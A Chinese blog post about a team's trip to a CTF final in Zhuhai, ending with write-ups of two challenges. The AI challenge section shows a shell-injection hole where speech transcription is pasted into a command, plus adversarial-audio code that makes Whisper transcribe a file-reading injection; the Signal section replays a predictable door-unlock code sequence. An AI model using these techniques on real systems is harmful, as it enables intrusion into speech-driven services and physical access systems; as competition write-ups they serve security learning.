本次也是非常幸运的,在候补名单里面进了 GBACC 的决赛

因为得到消息的时候,是周四,我们下周一就要打决赛了,所以光速定了酒店和过去的高铁票

同样,因为是决赛,所以很可能就会变成我们的公费旅游环节,比赛的东西我会放到最后的

旅游

比赛前日——出发

我们是周六去的珠海,当天早上买的 10:14 的票从南站出发去的,第一次坐到有这样的桌子的高铁

我们总共两个队伍去,在我们没有商量的情况下,我们甚至买的同一班高铁(笑哭)

到了以后,我们先去酒店办理入住,但是因为我们来的太早了,实在是没有清理好的客房,于是让我们做了个登记,我们就去吃午餐了

在附近的广场吃完午餐,就去赛场先签到了

比赛前日——签到

比赛场馆是珠海国际会展中心,这个地方说实话,是真的大啊~~~

给你们看张酒店拍的图,感受一下(对面是澳门)

反正一路上走,看到很多湾区杯的牌牌,想着跟着走准没错,结果走了快20分钟才到那个门口(问就是找错门了)

首先在门口看到的,就是两个大牌牌

然后我们一路坐电梯上到4楼(这栋建筑只有1楼和4楼),找到签到处,签了个到,领取了我们的物资

其实我们第一次来的时候,来太早了,他们没上班,我们在隔壁的酒店坐了一会才过来的

把东西拿回酒店后,给手机稍微充了一下电我就出门了,我要去找我复读的哥们

比赛前日——串门

本次的目标是暨南大学(珠海校区),距离我们的酒店也不是很远,八公里,直接打个车过去

与大多数高校相同,这里不让陌生人进去,要进去只能混闸,那没办法,只能等哥们出来接了

我们先去吃了冰,说实话,我已经很久没吃过冰了,偶尔吃一次还是可以的

然后我们就逛了一圈暨大珠海(没拍图),我还见到了一种没见过的取快递方式

我们学校这边的驿站是会把取件码发到手机上的,凭取件码拿件后自助出库,或者是丰巢柜直接取,这边不是

首先,你得先根据提示找到你快递所属的快递公司,然后在货架上找到自己的快递

然后,你要打开拼多多(我也不知道为什么限定pdd),将身份码与你快递的条码同时放在自助出库机的摄像头内,同时扫到两个才能出库

emmmm,我不好评价,我感觉效率应该会很低

比赛前日——看题

比赛前一天,把AI题的附件给我们了,顺带告诉我们需要什么环境(鉴定为优秀赛事组委会)

然后我们就得到了 AI 题的附件,具体情况看下面比赛那一节吧

比赛当天——赛场

当天来到我们的位置,就看到了小零食袋

呜,第一次遇到会给零食袋到座位上的赛事组委会,他真的,我哭死。°(°¯᷄◠¯᷅°)°。

我们就迅速整理好我们的设备,然后进入了摸鱼模式(因为有开幕式)

比赛当天——赛中

到了九点半,终于开打了,然后开场 AI 题就不出所料的,被爆了

比赛过程中我们还是尽力去打了,但是嘛,yysy,干不过 =-=

比赛当天——赛后

赛后,见到了群里的 @Lil-Ran@ProbiusOfficial@Lil-Ran 是专程过来玩的,@ProbiusOfficial 是参赛选手(也是跟探姬同台竞技了)

其实吧,CTFer 面基就是,线上全是E人,线下全是I人,真的会很尴尬的

最后我们拿到的是入围奖(即参与奖),也是当做经历的一部分了

比赛

比赛这方面,因为不让用网(线下赛是这样的),所以打起来很多东西没法搜,特别是 S7COMM 协议的报文格式,我是真的没存,所以那个题目出不来

下面还是说一下我出来的那几个题目吧

AI 题

我忘了这题的题目名称叫什么了,反正是个 AI 题,提前给了附件的

在回到酒店以后,把附件下载下来,发现是一个LLM服务,但本质上是一个可利用语音识别的半个伪MCP服务

为什么我会说是 MCP 服务,是因为在代码中有这样的内容

1
2
3
4
5
chatbot_proc = await asyncio.create_subprocess_shell(
    f"python3 chatbot.py '{transcription}'",
    stdout=asyncio.subprocess.PIPE,
    stderr=asyncio.subprocess.STDOUT
)

chatbot.py 的用法是这样的

1
2
3
4
5
6
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("用法: python chat.py \"你的问题\"") 
        sys.exit(0)
    user_input = " ".join(sys.argv[1:])
    print("Chatbot:", get_response(user_input))

所以说,理论上,我们直接干扰这里传入的 transcription 即可,有点像 sql 注入,例如,这里假设我们传入 '; echo Hacked',那么拼接就得到 python chatbot.py '; echo Hacked'

根据这样的代码,能够搜到一篇文章

https://blog.bi0s.in/2025/07/14/Misc/DontWhisper-bi0sCTF2025/

里面给出了他们的原理和代码,我就不再赘述了,直接拿过来用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import torch
from whisper import load_model
from whisper.audio import log_mel_spectrogram, pad_or_trim
from whisper.tokenizer import get_tokenizer
import torchaudio
from torch import nn

DEVICE = "cuda"
target_text = "';cat /chal/flag'"
model = load_model("tiny.en")
model.eval()
tokenizer = get_tokenizer(
    model.is_multilingual,
    num_languages=model.num_languages,
    language="en",
    task="transcribe",
)
target_tokens = tokenizer.encode(target_text)
target_tokens = target_tokens + [50256]  # Add EOT token

adv = torch.randn(1, 16000*20, device=DEVICE, requires_grad=True)
optimizer = torch.optim.Adam([adv], lr=0.01)
loss_fn = nn.CrossEntropyLoss()

num_iterations = 50
for i in range(num_iterations):
    tokens = torch.tensor([[50257, 50362]], device=DEVICE)  # [SOT, EN]
    total_loss = 0
    for target_token in target_tokens:
        optimizer.zero_grad()
        mel = log_mel_spectrogram(adv, model.dims.n_mels, padding=16000*30)
        mel = pad_or_trim(mel, 3000).to(model.device)
        audio_features = model.embed_audio(mel)
        logits = model.logits(tokens, audio_features)[:, -1]
        loss = loss_fn(logits, torch.tensor([target_token], device=DEVICE))
        total_loss += loss
        loss.backward()
        optimizer.step()
        adv.data = adv.data.clamp(-1, 1)
        assert adv.max() <= 1 and adv.min() >= -1
        tokens = torch.cat([tokens, torch.tensor([[target_token]], device=DEVICE)], dim=1)
    print(f"Iteration {i+1}/{num_iterations}, Loss: {loss.item():.4f}")

torchaudio.save("adversarial.wav", adv.detach().cpu(), 16000)

print("Transcribing generated adversarial audio:")
result = model.transcribe(adv.detach().cpu().squeeze(0))
print(f"Transcription: {result['text']}")

本来我的命令是 cat /flag 的,但是做题的时候告诉我没有这个文件,队友测了一下这个题连路径都没改

az,那行吧

Signal

点击按遥控器开门,会下载一段以 0.1s 为分段,总长为 1.5s 的 wav 音频,直接看频谱图就能发现端倪

根据频谱图,因为我们难以看出为 0 的频谱段上方最大值是多少,所以我们倒着看,可以认为当这一 0.1s 中含有 600Hz 的时候,此段的值为 0,否则为 1

写一个 Python 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def detect_600hz_in_wav(path, thr=1e-3):
    fs, data = wav.read(path)                       # 读取 wav
    data = data.mean(axis=1)						# 姑且先掰成单声道
    data = data.astype(np.float32)

    win_len = int(round(0.1 * fs))                  # 0.1 s
    step    = win_len                               # 无重叠
    n_win   = 15

    seq = []

    # 600Hz 对应的 FFT bin
    freq_bins = np.fft.rfftfreq(win_len, d=1.0/fs)
    idx_600 = np.argmin(np.abs(freq_bins - 600.0))

    for i in range(n_win):
        start = i * step
        win   = data[start : start + win_len]
        # 直接 FFT,取幅度
        mag   = np.abs(np.fft.rfft(win))
        mag_600 = mag[idx_600]
        seq.append(1 if mag_600 > thr else 0)

    return "".join(list(map(str, seq)))

这样就可以得到所需要的数字序列,然后就是不断地去下载 wav 文件,看看这个序列有什么规律,主要考虑是一般的车子是有一个 code 一直在计算的动态的,所以尝试找到它的规律,结果发现

1
2
3
4
5
╰─ uv run F:\CTF\Workspace\GBACC-Finals\Signal\sol.py
['101101001000100', '100111001000111', '100110100110010', '101100100110010', '100110101001101', '100111001000100', '100111001010100', '100110101010100', '101101001000111', '100110101000100']

╰─ uv run F:\CTF\Workspace\GBACC-Finals\Signal\sol.py
['101101001000100', '100111001000111', '100110100110010', '101100100110010', '100110101001101', '100111001000100', '100111001010100', '100110101010100', '101101001000111', '100110101000100']

于是就被鉴定为固定序列了,即下一次的信号是可以预测的

尝试做一个自动化提交

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
CTF 题用:检测 1.5s wav
按 0.1s 切片,若每片 FFT 的 600Hz 频率分量大于阈值 → 0;否则 → 1
返回 15 位 0/1 序列
"""

import numpy as np
import scipy.io.wavfile as wav
import sys
import requests
import time

URL = "http://172.36.147.165:5000/"
GET_WAV_URL = URL + "generate_remote"
SUBMIT_URL = URL + "submit"
SEQUENCE = ['100110101001101', '100111001000100', '100111001010100', '100110101010100', '101101001000111', '100110101000100', '101100100110010', '101101001000100', '100111001000111', '100110100110010', '101100100110010']

# ... 函数省略

if __name__ == "__main__":
    # 第一次获取
    get_and_save_wav()
    result = detect_600hz_in_wav("tmp.wav")
    idx = SEQUENCE.index(result)
    print(result, idx)
    # 第二次获取
    t = time.time()
    get_and_save_wav()
    result = SEQUENCE[(idx + 1) % len(SEQUENCE)]
    print(result)
    submit_answer(result)
    print(time.time() - t)

发现一直在报错误,结果发现有一个码出现了两次,实际序列应该为

1
2
3
4
5
6
7
8
9
10
11
100110101001101
100111001000100
100111001010100
100110101010100
101101001000111
100110101000100
101100100110010
101101001000100
100111001000111
100110100110010
101100100110010

那我可管不了那么多,直接开爆,全都交一次就是了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
result_dict = {}

def get_and_save_wav(filename: str = "tmp.wav"):
    resp = requests.get(GET_WAV_URL)
    resp.raise_for_status()
    with open(filename, "wb") as f:
        f.write(resp.content)

if __name__ == "__main__":
    for _ in range(11):
        get_and_save_wav(f"{_}.wav")
        result = detect_600hz_in_wav(f"{_}.wav")
        result_dict[_] = result
    for file_id, answer in result_dict.items():
        print(file_id, answer)
        submit_answer(answer, wav_path=f"{file_id}.wav")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
╰─ uv run F:\CTF\Workspace\GBACC-Finals\Signal\sol.py
0 101100100110010
{"message":"\u4f60\u8fd9\u4e2a\u6d88\u606f\u6709\u70b9\u8fc7\u65f6\uff0c\u4e0d\u7ed9\u5f00\u95e8","success":false}

1 100110101001101
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

2 100111001000100
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

3 100111001010100
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

4 100110101010100
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

5 101101001000111
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

6 100110101000100
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

7 101100100110010
{"message":"\u4f60\u8fd9\u4e2a\u6d88\u606f\u6709\u70b9\u8fc7\u65f6\uff0c\u4e0d\u7ed9\u5f00\u95e8","success":false}

8 101101001000100
{"message":"\u95e8\u5f00\u5f00\nflag{good_signal_modem}","success":true}

9 100111001000111
{"message":"\u4f60\u8fd9\u4e2a\u6d88\u606f\u6709\u70b9\u8fc7\u65f6\uff0c\u4e0d\u7ed9\u5f00\u95e8","success":false}

10 100110100110010
{"message":"\u4f60\u8fd9\u4e2a\u6d88\u606f\u6709\u70b9\u8fc7\u65f6\uff0c\u4e0d\u7ed9\u5f00\u95e8","success":false}

然后就得到了有 4 个是无效答案,其他都能够出 flag => flag{good_signal_modem}

后日谈

难得进了一次阵势那么大的比赛的决赛,说实话,真的干不过其他人,好多大佬

这次比赛的内容也是比较新颖,Web3、工控、低空经济、AI什么的,传统的 CTF 已经不能满足现在的网络安全形式了,也确实该接触一些新的东西,而不是守着传统的那几个方向打不停,后面也是要扩大学习面了

相册